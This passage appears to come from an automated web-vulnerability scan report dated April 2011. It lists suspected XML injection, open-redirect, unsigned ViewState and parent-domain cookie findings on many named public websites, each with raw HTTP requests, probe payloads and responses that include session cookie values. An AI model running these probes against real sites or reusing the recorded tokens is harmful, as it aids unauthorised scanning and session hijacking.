Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kazaa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
ETag: "a092413087f137824e790b00075a20d9"
X-Runtime: 96
X-Head-Commit-Id: 9ff26652e060b35b7a084c6dec4ac8c9dbfa1e55
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: user_credentials=a6b11f5254763bfd36d48454c6ea8e88434ebe9027e7c8af2e224f92f45b9d3d7fd11cb99551a0ae3170b0ded4e7a12b4329091a4b9f64bbe46b6760be6fde62%3A%3A13625354; domain=.kazaa.com; path=/; expires=Mon, 02-May-2011 13:44:08 GMT
Set-Cookie:
Set-Cookie: _music.kazaa.net_session=BAh7CjoPc2Vzc2lvbl9pZCIlYzAzZTE3YmNlM2JhOWY1Y2U0MGYxYjc4NzIxYzcyYjM6EF9jc3JmX3Rva2VuIjFBVHE5WC9nWUFwUjBsd3BOL2krTzFOcXl2ZWx4WXlDQ1FZaVV2ZVllWi9rPSIVdXNlcl9jcmVkZW50aWFscyIBgGE2YjExZjUyNTQ3NjNiZmQzNmQ0ODQ1NGM2ZWE4ZTg4NDM0ZWJlOTAyN2U3YzhhZjJlMjI0ZjkyZjQ1YjlkM2Q3ZmQxMWNiOTk1NTFhMGFlMzE3MGIwZGVkNGU3YTEyYjQzMjkwOTFhNGI5ZjY0YmJlNDZiNjc2MGJlNmZkZTYyOg5yZXR1cm5fdG8iBi8iGHVzZXJfY3JlZGVudGlhbHNfaWRpAwrozw%3D%3D--e64fdf6f82b57ebac5100fbfafabbbf135f01f48; domain=.kazaa.com; path=/; HttpOnly
Content-Length: 19127
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html version='XHTML+RDFa 1.0' xmlns:audio='http://purl.org/media/audio#' xmln
...[SNIP]...
erms='http://purl.org/dc/terms/' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:media='http://purl.org/media#' xmlns:vcard='http://www.w3.org/2001/vcard-rdf/3.0#' xmlns:xsd='http://www.w3.org/2001/XMLSchema#' xmlns='http://www.w3.org/1999/xhtml'>
...[SNIP]...

10.17. http://www.macrumors.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.macrumors.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.macrumors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:47 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 101132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" co
...[SNIP]...
<br />
New channels: CNBC World, C-SPAN, C-SPAN 2, C-SPAN 3, Chiller, Disney XD, G4, Home Shopping Network, Jewelry Television, QVC, Sleuth, Soap Net, Style, Golf Channel, and WE tv.<br />
...[SNIP]...

10.18. http://www.orbitz.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.orbitz.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orbitz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 277
Date: Sat, 02 Apr 2011 13:34:54 GMT
Age: 0
Connection: close
Server: Apache
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/


   <?xml version="1.0" encoding="utf-8"?>
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html>
   <head>
       <title>404 Not Found</tit
...[SNIP]...

10.19. http://www.psu.edu/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.psu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache/1.3.37 (Unix)
Content-Type: text/x-server-parsed-html
Content-Length: 5468

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

10.20. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:15:17 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=8h1lg1ot2b7s39p6g99af3nha0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<a href="http://sudsonbleeker.com/feed/">xml feed</a>
...[SNIP]...

10.21. http://www.southwest.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.southwest.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.southwest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Set-Cookie: JSESSIONID=7BAC1D4D1BC33E55F57BA2ACBC41FAFE; Path=/flight
Set-Cookie: DiscCookie=disc=0%3A10%3A1301750911.143000%3A7290%408E1163BE687E63C94EE3D51AF74E9466FEB3DEE6; path=/; domain=www.southwest.com;
Set-Cookie: AccountBarCookie...[SNIP]...omain=www.southwest.com; Expires=Thu, 01-Apr-2021 23:36:11 GMT; Path=/
Vary: Accept-Encoding
X-Swa-ws: BAHQL
Content-Length: 54232

<?xml version="1.0" encoding="utf-8"?>


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Southwest Airlines - File Not Found</title>
<meta http-equiv=
...[SNIP]...

10.22. http://www.ufl.edu/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.ufl.edu
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ufl.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:12 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 5724

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

10.23. http://www.ultimate-guitar.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ultimate-guitar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 13:34:54 GMT
Content-Type: text/html
Connection: close
Content-Length: 6622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>#404 | File Missing @ Ultimate-Guitar.Com</title>
<meta HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.ultimate
...[SNIP]...
<img src="http://img.ultimate-guitar.com/_img/xml.gif" width="32" height="14" border="0" align="absmiddle">
...[SNIP]...

10.24. http://www.usgs.gov/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.usgs.gov
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usgs.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: accept-language,accept-charset
Date: Sat, 02 Apr 2011 13:49:52 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

10.25. http://www.where2getit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.where2getit.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.where2getit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:33 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Vary: accept-language,accept-charset,Accept-Encoding
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1052

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

10.26. http://www.wimp.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.wimp.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wimp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 13:27:01 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.27. http://www.wunderground.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.wunderground.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wunderground.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 12:46:27 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Cache-control: no-cache, must-revalidate, no-cache="Set-Cookie", private
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-CreationTime: 0.028
Set-Cookie: DT=1301748387:21949:365-o3; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 21219


<!DOCTYPE HTML>
<html>
   <head>
   <meta name="viewport" content="width=1008px">
   <meta name="description" content="Weather Underground provides weather information for worldwide locations, including cu
...[SNIP]...
<a href="http://wiki.wunderground.com/index.php/API_-_XML">API / XML Feeds</a>
...[SNIP]...

11. ASP.NET ViewState without MAC enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tasteofhome.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tasteofhome.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:51:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_headTag"><
...[SNIP]...
...[SNIP]...

12. Open redirection
There are 6 instances of this issue:


12.1. http://www.lalate.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lalate.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a4580ed22114c9bfc/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://news.lalate.com?.a4580ed22114c9bfc/=1

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.a4580ed22114c9bfc/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lalate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:16:39 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Location: http://news.lalate.com?.a4580ed22114c9bfc/=1
Content-Type: text/html
Content-Length: 413

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://w
...[SNIP]...

12.2. http://www.outsidehub.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsidehub.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a21e99389334330c9/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://www.outdoorhubmedia.com?.a21e99389334330c9/=1

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.a21e99389334330c9/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outsidehub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:17:51 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.outdoorhubmedia.com?.a21e99389334330c9/=1
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.outdoorhubme
...[SNIP]...

12.3. http://www.paypal-shopping.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paypal-shopping.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a41eb98fd482d7dba/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

https://shopping.paypal.com?.a41eb98fd482d7dba/=1

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.a41eb98fd482d7dba/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paypal-shopping.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:04:13 GMT
Server: Apache/2.2.12 (Unix) mod_ssl/2.2.12 OpenSSL/0.9.7d DAV/2
Location: https://shopping.paypal.com?.a41eb98fd482d7dba/=1
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://shopping.paypal
...[SNIP]...

12.4. http://www.swipebids.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.swipebids.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is used to perform an HTTP redirect. The payload .aa8aa6b452528219a/ was submitted in the REST URL parameter 1. This caused a redirection to the following URL:

http://www.swipeauctions.com.aa8aa6b452528219a/

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /.aa8aa6b452528219a/ HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swipebids.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:42:00 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.swipeauctions.com.aa8aa6b452528219a/
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.swipeauction
...[SNIP]...

12.5. http://www.swipebids.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.swipebids.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a1047f4f51f8a2875/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://www.swipeauctions.comfavicon.ico?.a1047f4f51f8a2875/=1

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.a1047f4f51f8a2875/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swipebids.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:41:58 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.swipeauctions.comfavicon.ico?.a1047f4f51f8a2875/=1
Content-Length: 351
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.swipeauction
...[SNIP]...

12.6. http://www.virtuagirlhd.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.virtuagirlhd.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .afed92f41353af628/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://www.virtuagirl.com?.afed92f41353af628/=1

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /favicon.ico?.afed92f41353af628/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virtuagirlhd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Sat, 02 Apr 2011 13:37:10 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
Location: http://www.virtuagirl.com?.afed92f41353af628/=1
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from www1.virtuagirl.com
X-Cache-Lookup: MISS from www1.virtuagirl.com:80
Via: 1.0 www1.virtuagirl.com:80 (squid/2.6.STABLE21)
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.virtuagirl.com?.afed92f41353af628/=1
...[SNIP]...

13. Cookie scoped to parent domain
There are 88 instances of this issue:


13.1. http://www.androidcentral.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: spe
Date: Sat, 02 Apr 2011 14:06:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: SESSff98d42578ac6106ce5b7f80c23f307a=hr1onak19pbmm2diiqpgglrca2; expires=Mon, 25-Apr-2011 17:39:51 GMT; path=/; domain=.androidcentral.com
Last-Modified: Sat, 02 Apr 2011 14:00:10 GMT
ETag: "acfc4415a958e438545290ed1f077f57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 367789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Home |
...[SNIP]...

13.2. http://www.easybib.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.easybib.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.easybib.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 13:31:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: BIBSESSID=nnaa8jpce46q9u08dcqc1n2kp6; expires=Sat, 09-Apr-2011 13:31:30 GMT; path=/; domain=.easybib.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml",CP="NOI DSP COR NID CURi DEVa OUR NOR"
Location: http://cdn.easybib.com/new-images/favicon.ico
Content-Length: 0


13.3. http://www.evite.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.evite.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.evite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: User-Agent
Expires: Sat, 02 Apr 2011 12:43:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:43:20 GMT
Content-Length: 4414
Connection: close
Set-Cookie: evsessionid=66.235.125.15.1301748200628547; path=/; domain=.evite.com


<!-- -->


<html>
<head>
<title>Evite</title>
<style type="text/css">@import url(http://cdn.evite.com/html/css/wizard_ie.css?ver=);</style>
<link rel="stylesheet" type="t
...[SNIP]...

13.4. http://www.genealogy.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.genealogy.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

